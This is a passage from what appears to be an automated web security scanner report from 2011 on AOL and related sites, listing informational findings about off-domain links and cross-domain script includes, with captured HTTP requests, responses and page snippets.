</body>
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js" type="text/javascript"></script>
...[SNIP]...

16.96. http://yellowpages.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yellowpages.aol.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://yellowpages.aol.com/?icid=navbar_YP_main5
The response contains the following links to other domains:
  • http://o.aolcdn.com/omniunih.js
  • http://o.aolcdn.com/yp/statics/aolyp/css131010/style.css
  • http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/YP_advert.gif
  • http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/close_loc.gif
  • http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/header_select.jpg
  • http://o.aolcdn.com/yp/statics/aolyp/js131010/i18ntext.js
  • http://o.aolcdn.com/yp/statics/aolyp/js131010/locmngr.js
  • http://o.aolcdn.com/yp/statics/aolyp/js131010/prototype.js
  • http://o.aolcdn.com/yp/statics/aolyp/js131010/yp.js
  • http://www.citysbest.com/
  • http://www.mapquest.com/
  • http://www.moviefone.com/
  • http://www.patch.com/
  • http://www.rentedspaces.com/
  • http://www.yellowpages.com/advertising/aol/

Request

GET /?icid=navbar_YP_main5 HTTP/1.1
Host: yellowpages.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=17224104F8E073DB96F56D00E1212059; Path=/yellowpages
Set-Cookie: recentSearches=; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Set-Cookie: recentlocations=; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Set-Cookie: reqId=ae3b17aa1bed2d84; Domain=yellowpages.aol.com; Path=/
Set-Cookie: sess_id=3fd40c2ad4939b38; Domain=yellowpages.aol.com; Expires=Thu, 05-May-2011 01:29:15 GMT; Path=/
Set-Cookie: local_guid=7b579074211441ec; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Content-Length: 38832

<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/prototype.js">
</script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/i18ntext.js" >
</script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/yp.js">
</script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/locmngr.js">
</script><link href="http://o.aolcdn.com/yp/statics/aolyp/css131010/style.css"
   rel="stylesheet" type="text/css" />
<link rel="SHORTCUT ICON" href="/favicon.ico" type="image/x-icon" />
...[SNIP]...
<div class="clear"><img src="http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/close_loc.gif" onclick="$('loc_mngr_div').hide()" alt="close"/></div>
...[SNIP]...
<td align="left" valign="middle"><img id="recLocBut" src="http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/header_select.jpg" alt="Select a location from your last searches" width="30" height="32" /></td>
...[SNIP]...
<div class="yellow_ad"><a href="http://www.yellowpages.com/advertising/aol/"><img src="http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/YP_advert.gif" alt="Advertise with Yellowpages" /></a>
...[SNIP]...
</a> | <a rel="nofollow"
href="http://www.citysbest.com/">
City's Best</a> | <a rel="nofollow" href="http://www.patch.com/">Patch</a>
...[SNIP]...
</a> | <a rel="nofollow" href="http://www.moviefone.com/">Movies</a> | <a rel="nofollow" href="http://www.mapquest.com/">MapQuest</a>
...[SNIP]...
</a> | <a rel="nofollow" href="http://www.rentedspaces.com/">Rentals</a>
...[SNIP]...
</script><script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

17. Cross-domain script include
There are 147 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


17.1. http://www.aim.com/products/express/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aim.com
Path:   /products/express/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://o.aolcdn.com/os/aim_web/aimcom/jquery.js
  • http://o.aolcdn.com/os/aim_web/aimcom/main.js
  • http://s2c.aol.com/s2cw/js/jquery.simplemodal.min.js
  • http://s2c.aol.com/s2cw/js/mc.s2c.min.js

Request

GET /products/express/ HTTP/1.1
Host: www.aim.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:51 GMT
Server: Apache
Content-Type: text/html
Content-Length: 8466

<html>
<head>
<link href="http://o.aolcdn.com/os/aim_web/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>AIM -
...[SNIP]...
<link href="http://o.aolcdn.com/os/aim_web/aimcom/main.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://o.aolcdn.com/os/aim_web/aimcom/jquery.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os/aim_web/aimcom/main.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s2c.aol.com/s2cw/js/jquery.simplemodal.min.js" charset="UTF-8" /></script>
<script type="text/javascript" src="http://s2c.aol.com/s2cw/js/mc.s2c.min.js" charset="UTF-8" /></script>
...[SNIP]...

17.2. http://www.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/omniunih.js
  • http://o.aolcdn.com/videoplayer/loader.js
  • http://platform.twitter.com/widgets.js
  • http://player.play.it/player/launchAolPlayer.js
  • http://portal.aolcdn.com/p5/_v42.5/js/override.60241.main.js

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1303579081524-New%7C1366651081524%3B%20s_nrgvo%3DNew%7C1366651081525%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-43.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/
Content-Length: 63392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<body class="stars">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v42.5/js/override.60241.main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.3. http://www.bankrate.com/funnel/mortgages/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /funnel/mortgages/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /funnel/mortgages/ HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
</iframe>
<script language="javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...

17.4. http://www.blogsmithmedia.com/www.dailyfinance.com/media/dailyfinance.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.dailyfinance.com/media/dailyfinance.css

Issue detail

The response dynamically includes the following script from another domain:
  • http://o.aolcdn.com/ads/adsWrapper.js

Request

GET /www.dailyfinance.com/media/dailyfinance.css HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Accept-Ranges: bytes
ntCoent-Length: 114472
Content-Type: text/css
Cache-Control: max-age=238
Expires: Thu, 05 May 2011 01:02:12 GMT
Date: Thu, 05 May 2011 00:58:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 114472

/*Gallery Start*/
/* CAPTIONED THUMB --------------- */
.gallery .all-galleries {
padding: 8px 0;
width: 470px;
margin: 0;
}
#content .gallery h2 {
margin: 0;
}
#content .gallery .all-galler
...[SNIP]...
</title>
5 <script src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...

17.5. http://www.citysbest.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/feedback/feedback1.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.multiauth-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&os=4
  • http://www.blogsmithmedia.com/www.citysbest.com/include/background.js?9
  • http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js?30

Request

GET /?icid=navbar_citysbest_main5 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:36 GMT; path=/
Content-Type: text/html
Content-Length: 15501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<!-- GLOBAL JQUERY INCLUDE HOTSPOT -->
       <script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.multiauth-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&os=4" type="text/javascript"></script>
<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.citysbest.com/include/background.js?9"></script>        
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js?30"></script>
...[SNIP]...
<!-- ADS WRAPPER HOTSPOT -->
       <script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...

17.6. http://www.crunchboard.com/opening/detailjob.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crunchboard.com
Path:   /opening/detailjob.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /opening/detailjob.php HTTP/1.1
Host: www.crunchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 11:10:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/
Location: ./index.php
Vary: Accept-Encoding,User-Agent
Content-Length: 6901
Connection: close
Content-Type: text/html; charset=UTF-8

<script language="javascript" type="text/javascript">
   
   function hidestatus(URL)
   {
   /*var local= /http:|crunchboard.com/;
   var match = URL.search( local );
   if( match == -1 )
   {
   URL='http://tcbiz.p
...[SNIP]...
</div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.7. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dabagirls.com
Path:   /|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The response dynamically includes the following script from another domain:
  • http://stats.wordpress.com/e-201118.js

Request

GET /|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dabagirls.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.dabagirls.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 10:56:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">

<head
...[SNIP]...
</div><script src="http://stats.wordpress.com/e-201118.js" type="text/javascript"></script>
...[SNIP]...

17.8. http://www.dailyfinance.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://js.adsonar.com/js/tw_dfp_adsonar.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/js/swfobject-1.5.1/swfobject.js
  • http://o.aolcdn.com/os/df/js/copyRight.js
  • http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.5.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.min.js&os=4
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
  • http://o.aolcdn.com/os_merge/?file=/df/js/jquery.globalheader-1.3.js&file=/df/js/jquery.globalsearchbox-1.3.js&file=/df/js/df-search0.6.js&file=/df/js/jslib1.5.js&file=/df/smartbox1.7.4.js
  • http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js?v=198

Request

GET /?icid=navbar_finance_main5 HTTP/1.1
Host: www.dailyfinance.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:33 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:33 GMT; path=/
Content-Type: text/html
Content-Length: 126939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<head>
<script src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<!-- End datalayer-beacon module --> <script src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.blogsmithmedia.com/www.dailyfinance.com/media/dailyfinance.css" media="screen, projection" />
<script type="text/javascript" src="http://o.aolcdn.com/js/swfobject-1.5.1/swfobject.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.5.min.js&amp;file=/aol/jquery.getjs-1.0.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.min.js&amp;os=4" ></script>


<script type="text/javascript" src="http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js?v=198"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/tw_dfp_adsonar.js"></script>
...[SNIP]...
<!-- script calls used for GCP -->


<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/df/js/jquery.globalheader-1.3.js&file=/df/js/jquery.globalsearchbox-1.3.js&file=/df/js/df-search0.6.js&file=/df/js/jslib1.5.js&file=/df/smartbox1.7.4.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js"></script>
<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/os/df/css/feeds_subscribe_en_us.css" />
<script type="text/javascript" src="http://o.aolcdn.com/os/df/js/copyRight.js"></script>
...[SNIP]...
</script>

<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js" type="text/javascript"><!--mce:0-->
...[SNIP]...

17.9. http://www.dailyfinance.com/markets/mostactives

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /markets/mostactives

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://o.aolcdn.com/ads/adsEnd.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/aim/web-aim/aimapi.js
  • http://o.aolcdn.com/art/merge/?f=/df_js/jquery.globalheader-1.3.js&f=/df_js/jquery.globalsearchbox-1.3.js&f=/df_js/jslib1.2.js&f=/df_js/df-search0.6.js&f=/df_js/smartbox1.7.4.js&expsec=2600000
  • http://o.aolcdn.com/dailyfinance/tools/static_c/__0322121228/js/??webaim.js,relegenceapi.js,relegence.js,RelegenceAjax.js,RelegenceNews.js,RelegenceTab.js,bootstrap.js,supertabs.js,crossdomain.js,swfobject-2_2.js,MarketsUpdater.js,QuoteUpdater.js,HomeBlock.js,QuoteInfo.js,Headlines.js,HeatUpdater.js
  • http://o.aolcdn.com/os/money/dailyfinance/js/gh/jquery-1.3.2.min.js

Request

GET /markets/mostactives HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:29 GMT; Path=/
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:29 GMT; Path=/
Content-Language: en
Content-Length: 90327
Keep-Alive: timeout=5, max=1000
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Market Movers: Most
...[SNIP]...
<link rel="stylesheet" href="http://o.aolcdn.com/dailyfinance/tools/static_c/__0322121228/css/??common.css,master.css,supertabs.css" type="text/css" />
<script language="javascript1.1" src="http://o.aolcdn.com/ads/adsWrapper.js" type="text/javascript"></script>
...[SNIP]...
<!-- Omniture -end- -->


<script type="text/javascript" src="http://o.aolcdn.com/aim/web-aim/aimapi.js"></script>

<script src="http://o.aolcdn.com/dailyfinance/tools/static_c/__0322121228/js/??webaim.js,relegenceapi.js,relegence.js,RelegenceAjax.js,RelegenceNews.js,RelegenceTab.js,bootstrap.js,supertabs.js,crossdomain.js,swfobject-2_2.js,MarketsUpdater.js,QuoteUpdater.js,HomeBlock.js,QuoteInfo.js,Headlines.js,HeatUpdater.js" type="text/javascript"></script>
...[SNIP]...
</style>
<script type="text/javascript" src="http://o.aolcdn.com/os/money/dailyfinance/js/gh/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/df_js/jquery.globalheader-1.3.js&f=/df_js/jquery.globalsearchbox-1.3.js&f=/df_js/jslib1.2.js&f=/df_js/df-search0.6.js&f=/df_js/smartbox1.7.4.js&expsec=2600000"></script>
...[SNIP]...
</div>

<script language="Javascript1.1" SRC="http://o.aolcdn.com/ads/adsEnd.js"></script>
...[SNIP]...

17.10. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://static.fmpub.net/zone/2555
  • http://static.fmpub.net/zone/936

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
